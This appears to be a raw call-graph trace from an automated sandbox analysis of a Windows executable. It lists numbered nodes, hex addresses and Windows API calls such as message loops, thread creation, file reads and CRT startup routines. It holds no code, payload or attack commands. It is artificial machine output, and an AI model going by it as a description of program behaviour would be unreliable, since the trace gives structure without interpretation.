WaitForSingleObject 98424->98427 98425 5b4d37 84 API calls 98425->98462 98426->98447 98427->98426 98427->98462 98428 5b6cd8 244 API calls 98428->98462 98429 636562 110 API calls 98429->98447 98431 5b6d79 109 API calls 98431->98462 98433 5f38aa Sleep 98433->98462 98434 5f44c8 Sleep 98434->98462 98437 5c1a36 59 API calls 98437->98447 98440 5b3ea3 68 API calls 98440->98447 98441 5bb020 244 API calls 98441->98462 98443 5bc26d 98445 5c1a36 59 API calls 98443->98445 98449 5bbf25 Mailbox 98445->98449 98446 5c1a36 59 API calls 98446->98462 98447->98412 98447->98415 98447->98418 98447->98420 98447->98423 98447->98424 98447->98429 98447->98433 98447->98434 98447->98437 98447->98440 98447->98462 98576 612baf 60 API calls 98447->98576 98577 5b5376 60 API calls 98447->98577 98578 5b6cd8 266 API calls 98447->98578 98579 6070e2 59 API calls 98447->98579 98580 6157ff QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98447->98580 98448 62c355 244 API calls 98448->98462 98449->98395 98549 5bc460 98449->98549 98451 5ba820 244 API calls 98451->98462 98452 5b53b0 244 API calls 98452->98462 98453 5b39be 68 API calls 98453->98462 98455 61a48d 89 API calls 98455->98462 98456 5f3e13 VariantClear 98456->98462 98457 606cf1 59 API calls Mailbox 98457->98462 98458 5f3ea9 VariantClear 98458->98462 98459 5f3c57 VariantClear 98459->98462 98460 607aad 59 API calls 98460->98462 98461 5b41c4 59 API calls Mailbox 98461->98462 98462->98406 98462->98407 98462->98408 98462->98409 98462->98410 98462->98412 98462->98414 98462->98417 98462->98420 98462->98421 98462->98425 98462->98428 98462->98431 98462->98441 98462->98443 98462->98446 98462->98447 98462->98448 98462->98449 98462->98451 98462->98452 98462->98453 98462->98455 98462->98456 98462->98457 98462->98458 98462->98459 98462->98460 98462->98461 98463 5b3ea3 68 API calls 98462->98463 98464 5b5190 59 API calls Mailbox 98462->98464 98465 62e60c 130 API calls 98462->98465 98502 5b52b0 98462->98502 98511 5b9a00 98462->98511 98518 5b9c80 98462->98518 98570 636655 59 API calls 98462->98570 98571 61a058 59 API calls Mailbox 98462->98571 98572 60e0aa 59 API calls 98462->98572 98573 606c62 59 API calls 2 library calls 98462->98573 98574 5b38ff 59 API calls 98462->98574 98575 5b3a40 59 API calls Mailbox 98462->98575 98463->98462 98464->98462 98465->98462 98466->98334 98467->98334 98468->98299 98469->98337 98470->98337 98471->98305 98472->98337 98473->98337 98474->98334 98475->98334 98476->98334 98477->98334 98641 5b3c30 98478->98641 98480 5b3eb3 98481 5b3f2d 98480->98481 98482 5b3ebd 98480->98482 98650 5b523c 59 API calls 98481->98650 98484 5d0fe6 Mailbox 59 API calls 98482->98484 98486 5b3ece 98484->98486 98485 5b3f1d 98485->98334 98487 5b3edc 98486->98487 98488 5c1207 59 API calls 98486->98488 98489 5b3eeb 98487->98489 98648 5c1bcc 59 API calls 2 library calls 98487->98648 98488->98487 98491 5d0fe6 Mailbox 59 API calls 98489->98491 98492 5b3ef5 98491->98492 98649 5b3bc8 68 API calls 98492->98649 98495 5b39c9 98494->98495 98496 5b3ea3 68 API calls 98495->98496 98497 5b39f0 98495->98497 98496->98497 98497->98329 98498->98337 98499->98334 98500->98337 98501->98390 98503 5b52c6 98502->98503 98507 5b5313 98502->98507 98504 5b52d3 PeekMessageW 98503->98504 98503->98507 98505 5b52ec 98504->98505 98504->98507 98505->98462 98507->98505 98508 5edf68 TranslateAcceleratorW 98507->98508 98509 5b533e PeekMessageW 98507->98509 98510 5b5352 TranslateMessage DispatchMessageW 98507->98510 98581 5b359e IsDialogMessageW GetClassLongW 98507->98581 98508->98507 98508->98509 98509->98505 98509->98507 98510->98509 98512 5b9a1d 98511->98512 98513 5b9a31 98511->98513 98582 5b94e0 98512->98582 98616 61a48d 89 API calls 4 library calls 98513->98616 98515 5b9a28 98515->98462 98517 5f2478 98517->98517 98519 5b9cb5 98518->98519 98520 5f247d 98519->98520 98522 5b9d1f 98519->98522 98532 5b9d79 98519->98532 98521 5b53b0 266 API calls 98520->98521 98523 5f2492 98521->98523 98525 5c1207 59 API calls 98522->98525 98522->98532 98547 5b9f50 Mailbox 98523->98547 98626 61a48d 89 API calls 4 library calls 98523->98626 98524 5c1207 59 API calls 98524->98532 98527 5f24d8 98525->98527 98529 5d2f70 __cinit 67 API calls 98527->98529 98528 5d2f70 __cinit 67 API calls 98528->98532 98529->98532 98530 5f24fa 98530->98462 98531 5b39be 68 API calls 98531->98547 98532->98524 98532->98528 98532->98530 98535 5b9f3a 98532->98535 98532->98547 98533 5b53b0 266 API calls 98533->98547 98535->98547 98627 61a48d 89 API calls 4 library calls 98535->98627 98536 5b4230 59 API calls 98536->98547 98537 5ba775 98631 61a48d 89 API calls 4 library calls 98537->98631 98541 5f27f9 98541->98462 98545 61a48d 89 API calls 98545->98547 98547->98531 98547->98533 98547->98536 98547->98537 98547->98545 98548 5ba058 98547->98548 98625 5c1bcc 59 API calls 2 library calls 98547->98625 98628 607aad 59 API calls 98547->98628 98629 62ccac 266 API calls 98547->98629 98630 62bc26 266 API calls Mailbox 98547->98630 98632 5b5190 59 API calls Mailbox 98547->98632 98633 629ab0 266 API calls Mailbox 98547->98633 98548->98462 98634 5d02d4 98549->98634 98551 5bc2b6 98551->98395 98554 5bc483 98551->98554 98552 6177eb 7 API calls Mailbox 98553 5bc46d 98552->98553 98553->98551 98553->98552 98555 5c1a36 59 API calls 98554->98555 98556 5bc4ad 98555->98556 98557 5b3ea3 68 API calls 98556->98557 98558 5bc4c2 Mailbox 98557->98558 98559 5c1a36 59 API calls 98558->98559 98560 5bc4ef 98559->98560 98561 5b3ea3 68 API calls 98560->98561 98564 5bc500 Mailbox 98561->98564 98562 5bc524 98562->98401 98564->98562 98639 5b5376 60 API calls 98564->98639 98640 60700c 266 API calls 98564->98640 98566->98462 98567->98403 98568->98403 98569->98403 98570->98462 98571->98462 98572->98462 98573->98462 98574->98462 98575->98462 98576->98447 98577->98447 98578->98447 98579->98447 98580->98447 98581->98507 98583 5b53b0 266 API calls 98582->98583 98584 5b951f 98583->98584 98585 5f2001 98584->98585 98598 5b9527 _memmove 98584->98598 98618 5b5190 59 API calls Mailbox 98585->98618 98587 5f22c0 98624 61a48d 89 API calls 4 library calls 98587->98624 98589 5f22de 98589->98589 98590 5b9583 98590->98515 98591 5b9944 98594 5d0fe6 Mailbox 59 API calls 98591->98594 98592 5b986a 98595 5b987f 98592->98595 98596 5f22b1 98592->98596 98593 5d0fe6 59 API calls Mailbox 98593->98598 98601 5b96e3 _memmove 98594->98601 98600 5d0fe6 Mailbox 59 API calls 98595->98600 98623 62a983 59 API calls 98596->98623 98598->98587 98598->98590 98598->98591 98598->98593 98599 5b9741 98598->98599 98604 5b96cf 98598->98604 98599->98592 98606 5f22a0 98599->98606 98610 5b977d 98599->98610 98612 5f2278 98599->98612 98614 5f2253 98599->98614 98619 5b8180 266 API calls 98599->98619 98600->98610 98601->98599 98602 5d0fe6 Mailbox 59 API calls 98601->98602 98603 5b970e 98601->98603 98602->98603 98603->98599 98617 5bcca0 266 API calls 98603->98617 98604->98591 98605 5b96dc 98604->98605 98607 5d0fe6 Mailbox 59 API calls 98605->98607 98622 61a48d 89 API calls 4 library calls 98606->98622 98607->98601 98610->98515 98621 61a48d 89 API calls 4 library calls 98612->98621 98620 61a48d 89 API calls 4 library calls 98614->98620 98616->98517 98617->98599 98618->98591 98619->98599 98620->98610 98621->98610 98622->98610 98623->98587 98624->98589 98625->98547 98626->98547 98627->98547 98628->98547 98629->98547 98630->98547 98631->98541 98632->98547 98633->98547 98637 5d02df 98634->98637 98635 5d02e7 98635->98553 98637->98635 98638 622db2 InternetCloseHandle InternetCloseHandle WaitForSingleObject 98637->98638 98638->98637 98639->98564 98640->98564 98642 5b3c43 98641->98642 98643 5b3e11 98641->98643 98644 5b3c54 98642->98644 98645 5c1207 59 API calls 98642->98645 98643->98480 98644->98480 98646 5b3e73 98645->98646 98647 5d2f70 __cinit 67 API calls 98646->98647 98647->98644 98648->98489 98649->98485 98650->98485 98651->98008 98652 5b9a88 98655 5b86e0 98652->98655 98656 5b86fd 98655->98656 98657 5f0fad 98656->98657 98658 5f0ff8 98656->98658 98678 5b8724 98656->98678 98661 5f0fb5 98657->98661 98665 5f0fc2 98657->98665 98657->98678 98690 62aad0 266 API calls __cinit 98658->98690 98659 5b5278 59 API calls 98659->98678 98688 62b0e4 266 API calls 98661->98688 98663 5d2f70 __cinit 67 API calls 98663->98678 98669 5b898d 98665->98669 98689 62b58c 266 API calls 3 library calls 98665->98689 98666 5b3f42 68 API calls 98666->98678 98667 5f1289 98667->98667 98673 5b8a17 98669->98673 98694 61a48d 89 API calls 4 library calls 98669->98694 98670 5f11af 98693 62ae3b 89 API calls 98670->98693 98674 5b39be 68 API calls 98674->98678 98678->98659 98678->98663 98678->98666 98678->98669 98678->98670 98678->98673 98678->98674 98680 5b3c30 68 API calls 98678->98680 98681 5b53b0 266 API calls 98678->98681 98682 5c1c9c 59 API calls 98678->98682 98684 5b3938 68 API calls 98678->98684 98685 5b855e 266 API calls 98678->98685 98686 5b84e2 89 API calls 98678->98686 98687 5b835f 266 API calls 98678->98687 98691 5b523c 59 API calls 98678->98691 98692 6073ab 59 API calls 98678->98692 98680->98678 98681->98678 98682->98678 98684->98678 98685->98678 98686->98678 98687->98678 98688->98665 98689->98669 98690->98678 98691->98678 98692->98678 98693->98669 98694->98667 98695 5eb7ad 98698 5bad98 98695->98698 98699 5f2f63 DestroyWindow 98698->98699 98700 5badd7 mciSendStringW 98698->98700 98711 5f2f6f 98699->98711 98701 5badf3 98700->98701 98702 5bafc0 98700->98702 98704 5bae01 98701->98704 98701->98711 98702->98701 98703 5bafcf UnregisterHotKey 98702->98703 98703->98702 98734 5bc71f 98704->98734 98706 5f2f8d FindClose 98706->98711 98707 5f2fb4 98712 5f2fc7 FreeLibrary 98707->98712 98713 5f2fd8 98707->98713 98710 5bae16 98710->98713 98720 5bae24 98710->98720 98711->98706 98711->98707 98745 5c42cf 98711->98745 98712->98707 98714 5f2fec VirtualFree 98713->98714 98715 5f301a 98713->98715 98714->98713 98717 5bae91 98715->98717 98738 617079 98715->98738 98716 5bae80 OleUninitialize 98716->98715 98716->98717 98718 5bae9c 98717->98718 98719 5f3033 98717->98719 98721 5baeac Mailbox 98718->98721 98723 5f3042 98719->98723 98749 61a240 CloseHandle 98719->98749 98720->98716 98743 5cfef1 61 API calls Mailbox 98721->98743 98729 5f3056 98723->98729 98750 60d5cb 59 API calls Mailbox 98723->98750 98725 5baec2 Mailbox 98744 5d052f 59 API calls Mailbox 98725->98744 98729->98729 98735 5bc72e Mailbox 98734->98735 98736 5bae08 98735->98736 98751 60e0aa 59 API calls 98735->98751 98736->98707 98736->98710 98752 6177eb 98738->98752 98741 5d105c 98742 6170a1 DeleteCriticalSection 98741->98742 98742->98717 98743->98725 98746 5c42e8 98745->98746 98747 5c42d9 98745->98747 98746->98747 98748 5c42ed CloseHandle 98746->98748 98747->98711 98748->98747 98749->98719 98750->98723 98751->98735 98753 6177f7 InterlockedExchange 98752->98753 98754 617087 FindCloseChangeNotification CloseHandle 98752->98754 98753->98754 98755 61780b EnterCriticalSection TerminateThread WaitForSingleObject 98753->98755 98754->98741 98758 6171f0 CloseHandle 98755->98758 98757 617836 InterlockedExchange LeaveCriticalSection 98757->98754 98758->98757 98759 5b9a6c 98762 5b829c 98759->98762 98761 5b9a78 98763 5b8308 98762->98763 98764 5b82b4 98762->98764 98768 5b8331 98763->98768 98772 61a48d 89 API calls 4 library calls 98763->98772 98764->98763 98765 5b53b0 266 API calls 98764->98765 98769 5b82eb 98765->98769 98767 5f0ed8 98767->98767 98768->98761 98769->98768 98771 5b523c 59 API calls 98769->98771 98771->98763 98772->98767 98773 5b6981 98780 5b373a 98773->98780 98775 5b6997 98789 5b7b3f 98775->98789 98777 5b69bf 98779 5b584d 98777->98779 98801 61a48d 89 API calls 4 library calls 98777->98801 98781 5b3758 98780->98781 98782 5b3746 98780->98782 98783 5b375e 98781->98783 98784 5b3787 98781->98784 98802 5b523c 59 API calls 98782->98802 98786 5d0fe6 Mailbox 59 API calls 98783->98786 98803 5b523c 59 API calls 98784->98803 98788 5b3750 98786->98788 98788->98775 98790 5c162d 59 API calls 98789->98790 98791 5b7b64 _wcscmp 98790->98791 98792 5c1a36 59 API calls 98791->98792 98795 5b7b98 Mailbox 98791->98795 98793 5effad 98792->98793 98804 5c17e0 59 API calls Mailbox 98793->98804 98795->98777 98796 5effb8 98805 5b3938 68 API calls 98796->98805 98798 5effc9 98800 5effcd Mailbox 98798->98800 98806 5b523c 59 API calls 98798->98806 98800->98777 98801->98779 98802->98788 98803->98788 98804->98796 98805->98798 98806->98800 98807 5b1066 98812 5baaaa 98807->98812 98809 5b106c 98810 5d2f70 __cinit 67 API calls 98809->98810 98811 5b1076 98810->98811 98813 5baacb 98812->98813 98844 5d02eb 98813->98844 98817 5bab12 98818 5c1207 59 API calls 98817->98818 98819 5bab1c 98818->98819 98820 5c1207 59 API calls 98819->98820 98821 5bab26 98820->98821 98822 5c1207 59 API calls 98821->98822 98823 5bab30 98822->98823 98824 5c1207 59 API calls 98823->98824 98825 5bab6e 98824->98825 98826 5c1207 59 API calls 98825->98826 98827 5bac39 98826->98827 98854 5d0588 98827->98854 98831 5bac6b 98832 5c1207 59 API calls 98831->98832 98833 5bac75 98832->98833 98882 5cfe2b 98833->98882 98835 5bacbc 98836 5baccc GetStdHandle 98835->98836 98837 5bad18 98836->98837 98838 5f2f39 98836->98838 98839 5bad20 OleInitialize 98837->98839 98838->98837 98889 6170f3 98838->98889 98839->98809 98841 5f2f49 98895 6177c2 98841->98895 98898 5d03c4 98844->98898 98847 5d03c4 59 API calls 98848 5d032d 98847->98848 98849 5c1207 59 API calls 98848->98849 98850 5d0339 98849->98850 98851 5c1821 59 API calls 98850->98851 98852 5baad1 98851->98852 98853 5d07bb 6 API calls 98852->98853 98853->98817 98855 5c1207 59 API calls 98854->98855 98856 5d0598 98855->98856 98857 5c1207 59 API calls 98856->98857 98858 5d05a0 98857->98858 98905 5c10c3 98858->98905 98861 5c10c3 59 API calls 98862 5d05b0 98861->98862 98863 5c1207 59 API calls 98862->98863 98864 5d05bb 98863->98864 98865 5d0fe6 Mailbox 59 API calls 98864->98865 98866 5bac43 98865->98866 98867 5cff4c 98866->98867 98868 5cff5a 98867->98868 98869 5c1207 59 API calls 98868->98869 98870 5cff65 98869->98870 98871 5c1207 59 API calls 98870->98871 98872 5cff70 98871->98872 98873 5c1207 59 API calls 98872->98873 98874 5cff7b 98873->98874 98875 5c1207 59 API calls 98874->98875 98876 5cff86 98875->98876 98877 5c10c3 59 API calls 98876->98877 98878 5cff91 98877->98878 98879 5d0fe6 Mailbox 59 API calls 98878->98879 98880 5cff98 RegisterWindowMessageW 98879->98880 98880->98831 98883 5cfe3b 98882->98883 98884 60620c 98882->98884 98886 5d0fe6 Mailbox 59 API calls 98883->98886 98908 61a12a 59 API calls 98884->98908 98888 5cfe43 98886->98888 98887 606217 98888->98835 98890 5d0fe6 Mailbox 59 API calls 98889->98890 98891 6170fd 98890->98891 98892 61710c 98891->98892 98909 616fda InitializeCriticalSectionAndSpinCount 98891->98909 98892->98841 98894 61710a 98894->98841 98896 6177d0 CreateThread 98895->98896 98897 5f2f55 FindCloseChangeNotification 98895->98897 98896->98897 98915 6177a8 98896->98915 98897->98839 98899 5c1207 59 API calls 98898->98899 98900 5d03cf 98899->98900 98901 5c1207 59 API calls 98900->98901 98902 5d03d7 98901->98902 98903 5c1207 59 API calls 98902->98903 98904 5d0323 98903->98904 98904->98847 98906 5c1207 59 API calls 98905->98906 98907 5c10cb 98906->98907 98907->98861 98908->98887 98912 617221 98909->98912 98913 617016 InterlockedExchange 98912->98913 98914 61722f GetCurrentProcess GetCurrentProcess DuplicateHandle 98912->98914 98913->98894 98914->98913 98916 6177b2 98915->98916 98917 6177b7 98915->98917 98919 617681 InterlockedExchange 98916->98919 98920 5d0fe6 Mailbox 59 API calls 98919->98920 98921 6176a8 98920->98921 98922 5d0fe6 Mailbox 59 API calls 98921->98922 98923 6176bb ReadFile 98922->98923 98924 617788 98923->98924 98925 6176dd 98923->98925 98927 617791 InterlockedExchange 98924->98927 98925->98924 98926 6176e7 EnterCriticalSection 98925->98926 98930 61770f _memmove 98925->98930 98926->98925 98926->98930 98927->98917 98928 61775b LeaveCriticalSection ReadFile 98928->98924 98928->98925 98929 5d0fe6 Mailbox 59 API calls 98929->98930 98930->98928 98930->98929 98931 5ee463 98932 5b373a 59 API calls 98931->98932 98933 5ee479 98932->98933 98934 5ee48f 98933->98934 98935 5ee4fa 98933->98935 98943 5b5376 60 API calls 98934->98943 98937 5bb020 266 API calls 98935->98937 98939 5ee4ee Mailbox 98937->98939 98941 5ef046 Mailbox 98939->98941 98945 61a48d 89 API calls 4 library calls 98939->98945 98940 5ee4ce 98940->98939 98944 61890a 59 API calls Mailbox 98940->98944 98943->98940 98944->98939 98945->98941 98946 5d7e83 98947 5d7e8f _fprintf 98946->98947 98983 5da038 GetStartupInfoW 98947->98983 98949 5d7e94 98985 5d8dac GetProcessHeap 98949->98985 98951 5d7eec 98952 5d7ef7 98951->98952 99071 5d7fd3 58 API calls 3 library calls 98951->99071 98986 5d9d16 98952->98986 98955 5d7efd 98956 5d7f08 __RTC_Initialize 98955->98956 99072 5d7fd3 58 API calls 3 library calls 98955->99072 99007 5dd802 98956->99007 98959 5d7f17 98960 5d7f23 GetCommandLineW 98959->98960 99073 5d7fd3 58 API calls 3 library calls 98959->99073 99026 5e5153 GetEnvironmentStringsW 98960->99026 98964 5d7f22 98964->98960 98966 5d7f3d 98967 5d7f48 98966->98967 99074 5d32e5 58 API calls 3 library calls 98966->99074 99036 5e4f88 98967->99036 98970 5d7f4e 98971 5d7f59 98970->98971 99075 5d32e5 58 API calls 3 library calls 98970->99075 99050 5d331f 98971->99050 98974 5d7f61 98975 5d7f6c __wwincmdln 98974->98975 99076 5d32e5 58 API calls 3 library calls 98974->99076 99056 5c5f8b 98975->99056 98978 5d7f80 98979 5d7f8f 98978->98979 99068 5d3588 98978->99068 99077 5d3310 58 API calls _doexit 98979->99077 98982 5d7f94 _fprintf 98984 5da04e 98983->98984 98984->98949 98985->98951 99078 5d33b7 36 API calls 2 library calls 98986->99078 98988 5d9d1b 99079 5d9f6c InitializeCriticalSectionAndSpinCount __mtinitlocknum 98988->99079 98990 5d9d20 98991 5d9d24 98990->98991 99081 5d9fba TlsAlloc 98990->99081 99080 5d9d8c 61 API calls 2 library calls 98991->99080 98994 5d9d29 98994->98955 98995 5d9d36 98995->98991 98996 5d9d41 98995->98996 99082 5d8a05 98996->99082 98999 5d9d83 99090 5d9d8c 61 API calls 2 library calls 98999->99090 99002 5d9d62 99002->98999 99004 5d9d68 99002->99004 99003 5d9d88 99003->98955 99089 5d9c63 58 API calls 4 library calls 99004->99089 99006 5d9d70 GetCurrentThreadId 99006->98955 99008 5dd80e _fprintf 99007->99008 99009 5d9e3b __lock 58 API calls 99008->99009 99010 5dd815 99009->99010 99011 5d8a05 __calloc_crt 58 API calls 99010->99011 99012 5dd826 99011->99012 99013 5dd891 GetStartupInfoW 99012->99013 99014 5dd831 @_EH4_CallFilterFunc@8 _fprintf 99012->99014 99020 5dd8a6 99013->99020 99023 5dd9d5 99013->99023 99014->98959 99015 5dda9d 99104 5ddaad LeaveCriticalSection _doexit 99015->99104 99017 5d8a05 __calloc_crt 58 API calls 99017->99020 99018 5dda22 GetStdHandle 99018->99023 99019 5dda35 GetFileType 99019->99023 99020->99017 99022 5dd8f4 99020->99022 99020->99023 99021 5dd928 GetFileType 99021->99022 99022->99021 99022->99023 99102 5da05b InitializeCriticalSectionAndSpinCount 99022->99102 99023->99015 99023->99018 99023->99019 99103 5da05b InitializeCriticalSectionAndSpinCount 99023->99103 99027 5d7f33 99026->99027 99028 5e5164 99026->99028 99032 5e4d4b GetModuleFileNameW 99027->99032 99105 5d8a4d 58 API calls 2 library calls 99028->99105 99030 5e518a _memmove 99031 5e51a0 FreeEnvironmentStringsW 99030->99031 99031->99027 99033 5e4d7f _wparse_cmdline 99032->99033 99035 5e4dbf _wparse_cmdline 99033->99035 99106 5d8a4d 58 API calls 2 library calls 99033->99106 99035->98966 99037 5e4fa1 __NMSG_WRITE 99036->99037 99038 5e4f99 99036->99038 99039 5d8a05 __calloc_crt 58 API calls 99037->99039 99038->98970 99046 5e4fca __NMSG_WRITE 99039->99046 99040 5e5021 99041 5d2f85 _free 58 API calls 99040->99041 99041->99038 99042 5d8a05 __calloc_crt 58 API calls 99042->99046 99043 5e5046 99044 5d2f85 _free 58 API calls 99043->99044 99044->99038 99046->99038 99046->99040 99046->99042 99046->99043 99047 5e505d 99046->99047 99107 5e4837 58 API calls __mbsnbicoll_l 99046->99107 99108 5d8ff6 IsProcessorFeaturePresent 99047->99108 99049 5e5069 99049->98970 99052 5d332b __IsNonwritableInCurrentImage 99050->99052 99131 5da701 99052->99131 99053 5d3349 __initterm_e 99054 5d2f70 __cinit 67 API calls 99053->99054 99055 5d3368 _doexit __IsNonwritableInCurrentImage 99053->99055 99054->99055 99055->98974 99057 5c5fa5 99056->99057 99058 5c6044 99056->99058 99059 5c5fdf IsThemeActive 99057->99059 99058->98978 99134 5d359c 99059->99134 99063 5c600b 99146 5c5f00 SystemParametersInfoW SystemParametersInfoW 99063->99146 99065 5c6017 99147 5c5240 99065->99147 99067 5c601f SystemParametersInfoW 99067->99058 100186 5d3459 99068->100186 99070 5d3597 99070->98979 99071->98952 99072->98956 99073->98964 99077->98982 99078->98988 99079->98990 99080->98994 99081->98995 99083 5d8a0c 99082->99083 99085 5d8a47 99083->99085 99087 5d8a2a 99083->99087 99091 5e5426 99083->99091 99085->98999 99088 5da016 TlsSetValue 99085->99088 99087->99083 99087->99085 99099 5da362 Sleep 99087->99099 99088->99002 99089->99006 99090->99003 99092 5e5431 99091->99092 99097 5e544c 99091->99097 99093 5e543d 99092->99093 99092->99097 99100 5d8d58 58 API calls __getptd_noexit 99093->99100 99095 5e545c RtlAllocateHeap 99096 5e5442 99095->99096 99095->99097 99096->99083 99097->99095 99097->99096 99101 5d35d1 DecodePointer 99097->99101 99099->99087 99100->99096 99101->99097 99102->99022 99103->99023 99104->99014 99105->99030 99106->99035 99107->99046 99109 5d9001 99108->99109 99114 5d8e89 99109->99114 99113 5d901c 99113->99049 99115 5d8ea3 _memset __call_reportfault 99114->99115 99116 5d8ec3 IsDebuggerPresent 99115->99116 99122 5da385 SetUnhandledExceptionFilter UnhandledExceptionFilter 99116->99122 99119 5d8f87 __call_reportfault 99123 5dc826 99119->99123 99120 5d8faa 99121 5da370 GetCurrentProcess TerminateProcess 99120->99121 99121->99113 99122->99119 99124 5dc82e 99123->99124 99125 5dc830 IsProcessorFeaturePresent 99123->99125 99124->99120 99127 5e5b3a 99125->99127 99130 5e5ae9 5 API calls 2 library calls 99127->99130 99129 5e5c1d 99129->99120 99130->99129 99132 5da704 EncodePointer 99131->99132 99132->99132 99133 5da71e 99132->99133 99133->99053 99135 5d9e3b __lock 58 API calls 99134->99135 99136 5d35a7 DecodePointer EncodePointer 99135->99136 99199 5d9fa5 LeaveCriticalSection 99136->99199 99138 5c6004 99139 5d3604 99138->99139 99140 5d360e 99139->99140 99141 5d3628 99139->99141 99140->99141 99200 5d8d58 58 API calls __getptd_noexit 99140->99200 99141->99063 99143 5d3618 99201 5d8fe6 9 API calls __mbsnbicoll_l 99143->99201 99145 5d3623 99145->99063 99146->99065 99148 5c524d __ftell_nolock 99147->99148 99149 5c1207 59 API calls 99148->99149 99150 5c5258 GetCurrentDirectoryW 99149->99150 99202 5c4ec8 99150->99202 99152 5c527e IsDebuggerPresent 99153 5c528c 99152->99153 99154 600b21 MessageBoxA 99152->99154 99155 600b39 99153->99155 99156 5c52a0 99153->99156 99154->99155 99310 5c314d 59 API calls Mailbox 99155->99310 99270 5c31bf 99156->99270 99159 600b49 99166 600b5f SetCurrentDirectoryW 99159->99166 99161 5c52be GetFullPathNameW 99163 5c1821 59 API calls 99161->99163 99162 5c535f SetCurrentDirectoryW 99165 5c536c Mailbox 99162->99165 99164 5c52f9 99163->99164 99286 5bbbc6 99164->99286 99165->99067 99166->99165 99186 5c5358 99186->99162 99199->99138 99200->99143 99201->99145 99203 5c1207 59 API calls 99202->99203 99204 5c4ede 99203->99204 99313 5c5420 99204->99313 99206 5c4efc 99207 5c19e1 59 API calls 99206->99207 99208 5c4f10 99207->99208 99209 5c1c9c 59 API calls 99208->99209 99210 5c4f1b 99209->99210 99327 5b477a 99210->99327 99213 5c1a36 59 API calls 99214 5c4f34 99213->99214 99215 5b39be 68 API calls 99214->99215 99216 5c4f44 Mailbox 99215->99216 99217 5c1a36 59 API calls 99216->99217 99218 5c4f68 99217->99218 99219 5b39be 68 API calls 99218->99219 99220 5c4f77 Mailbox 99219->99220 99221 5c1207 59 API calls 99220->99221 99222 5c4f94 99221->99222 99330 5c55bc 99222->99330 99225 5d312d _W_store_winword 60 API calls 99226 5c4fae 99225->99226 99227 600a54 99226->99227 99228 5c4fb8 99226->99228 99229 5c55bc 59 API calls 99227->99229 99230 5d312d _W_store_winword 60 API calls 99228->99230 99231 600a68 99229->99231 99232 5c4fc3 99230->99232 99235 5c55bc 59 API calls 99231->99235 99232->99231 99233 5c4fcd 99232->99233 99234 5d312d _W_store_winword 60 API calls 99233->99234 99236 5c4fd8 99234->99236 99237 600a84 99235->99237 99236->99237 99238 5c4fe2 99236->99238 99239 5d00cf 61 API calls 99237->99239 99240 5d312d _W_store_winword 60 API calls 99238->99240 99241 600aa7 99239->99241 99242 5c4fed 99240->99242 99243 5c55bc 59 API calls 99241->99243 99244 600ad0 99242->99244 99245 5c4ff7 99242->99245 99246 600ab3 99243->99246 99248 5c55bc 59 API calls 99244->99248 99247 5c501b 99245->99247 99250 5c1c9c 59 API calls 99245->99250 99249 5c1c9c 59 API calls 99246->99249 99254 5b47be 59 API calls 99247->99254 99251 600aee 99248->99251 99252 600ac1 99249->99252 99253 5c500e 99250->99253 99255 5c1c9c 59 API calls 99251->99255 99256 5c55bc 59 API calls 99252->99256 99257 5c55bc 59 API calls 99253->99257 99258 5c502a 99254->99258 99259 600afc 99255->99259 99256->99244 99257->99247 99261 5b4540 59 API calls 99258->99261 99260 5c55bc 59 API calls 99259->99260 99262 600b0b 99260->99262 99263 5c5038 99261->99263 99262->99262 99336 5b43d0 99263->99336 99265 5b477a 59 API calls 99267 5c5055 99265->99267 99266 5b43d0 59 API calls 99266->99267 99267->99265 99267->99266 99268 5c55bc 59 API calls 99267->99268 99269 5c509b Mailbox 99267->99269 99268->99267 99269->99152 99271 5c31cc __ftell_nolock 99270->99271 99272 600314 _memset 99271->99272 99273 5c31e5 99271->99273 99275 600330 GetOpenFileNameW 99272->99275 99274 5d0284 60 API calls 99273->99274 99276 5c31ee 99274->99276 99277 60037f 99275->99277 99350 5d09c5 99276->99350 99279 5c1821 59 API calls 99277->99279 99282 600394 99279->99282 99282->99282 99283 5c3203 99368 5c278a 99283->99368 99287 5bbbd3 __ftell_nolock 99286->99287 100169 5c2cb2 99287->100169 99310->99159 99314 5c542d __ftell_nolock 99313->99314 99315 5c1821 59 API calls 99314->99315 99320 5c5590 Mailbox 99314->99320 99317 5c545f 99315->99317 99324 5c5495 Mailbox 99317->99324 99345 5c1609 99317->99345 99318 5c5563 99319 5c1a36 59 API calls 99318->99319 99318->99320 99321 5c5584 99319->99321 99320->99206 99323 5c4c94 59 API calls 99321->99323 99322 5c1a36 59 API calls 99322->99324 99323->99320 99324->99318 99324->99320 99324->99322 99325 5c4c94 59 API calls 99324->99325 99326 5c1609 59 API calls 99324->99326 99325->99324 99326->99324 99328 5d0fe6 Mailbox 59 API calls 99327->99328 99329 5b4787 99328->99329 99329->99213 99331 5c55df 99330->99331 99332 5c55c6 99330->99332 99334 5c1821 59 API calls 99331->99334 99333 5c1c9c 59 API calls 99332->99333 99335 5c4fa0 99333->99335 99334->99335 99335->99225 99337 5ed6c9 99336->99337 99339 5b43e7 99336->99339 99337->99339 99349 5b40cb 59 API calls Mailbox 99337->99349 99340 5b44e8 99339->99340 99341 5b4530 99339->99341 99344 5b44ef 99339->99344 99343 5d0fe6 Mailbox 59 API calls 99340->99343 99348 5b523c 59 API calls 99341->99348 99343->99344 99344->99267 99346 5c1aa4 59 API calls 99345->99346 99347 5c1614 99346->99347 99347->99317 99348->99344 99349->99339 99351 5e1b70 __ftell_nolock 99350->99351 99352 5d09d2 GetLongPathNameW 99351->99352 99353 5c1821 59 API calls 99352->99353 99354 5c31f7 99353->99354 99355 5c2f3d 99354->99355 99356 5c1207 59 API calls 99355->99356 99357 5c2f4f 99356->99357 99358 5d0284 60 API calls 99357->99358 99359 5c2f5a 99358->99359 99360 600177 99359->99360 99361 5c2f65 99359->99361 99366 600191 99360->99366 99408 5c151f 61 API calls 99360->99408 99363 5c4c94 59 API calls 99361->99363 99364 5c2f71 99363->99364 99402 5b1307 99364->99402 99367 5c2f84 Mailbox 99367->99283 99409 5c49c2 99368->99409 99371 5ff8d6 99526 619b16 99371->99526 99373 5c49c2 136 API calls 99375 5c27c3 99373->99375 99375->99371 99378 5c27cb 99375->99378 99376 5ff8eb 99584 5c4a2f 99376->99584 99377 5ff908 99380 5d0fe6 Mailbox 59 API calls 99377->99380 99381 5c27d7 99378->99381 99382 5ff8f3 99378->99382 99399 5ff94d Mailbox 99380->99399 99433 5c29be 99381->99433 99590 6147e8 90 API calls _wprintf 99382->99590 99386 5ff901 99386->99377 99387 5ffb01 99388 5d2f85 _free 58 API calls 99387->99388 99389 5ffb09 99388->99389 